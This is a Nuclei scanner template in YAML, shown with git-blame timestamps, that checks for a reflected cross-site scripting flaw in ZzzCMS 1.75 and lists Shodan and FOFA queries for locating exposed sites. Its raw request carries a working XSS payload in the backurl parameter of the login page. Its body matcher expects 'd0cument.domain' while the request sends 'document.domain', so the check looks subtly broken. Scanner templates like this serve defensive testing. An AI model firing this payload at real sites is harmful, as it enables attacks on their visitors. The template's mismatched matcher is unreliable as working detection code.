nuclei-templates/http/vulnerabilities/zzzcms/zzzcms-xss.yaml

39 lines
874 B
YAML
Raw Normal View History

2023-08-07 17:56:47 +00:00
id: zzzcms-xss
info:
name: Zzzcms 1.75 - Cross-Site Scripting
author: ritikchaddha
severity: medium
2023-08-07 18:10:55 +00:00
reference:
- https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.75%20xss%E6%BC%8F%E6%B4%9E.md
2023-08-07 17:56:47 +00:00
metadata:
max-request: 1
verified: true
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
tags: zzzcms,xss
http:
- raw:
- |
2023-08-07 18:10:55 +00:00
GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/document.domain/)%20y%3d HTTP/1.1
2023-08-07 17:56:47 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-08-07 18:10:55 +00:00
- 'onmouseover=alert(/d0cument.domain/) y=&act'
2023-08-07 17:56:47 +00:00
- 'document.write("'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200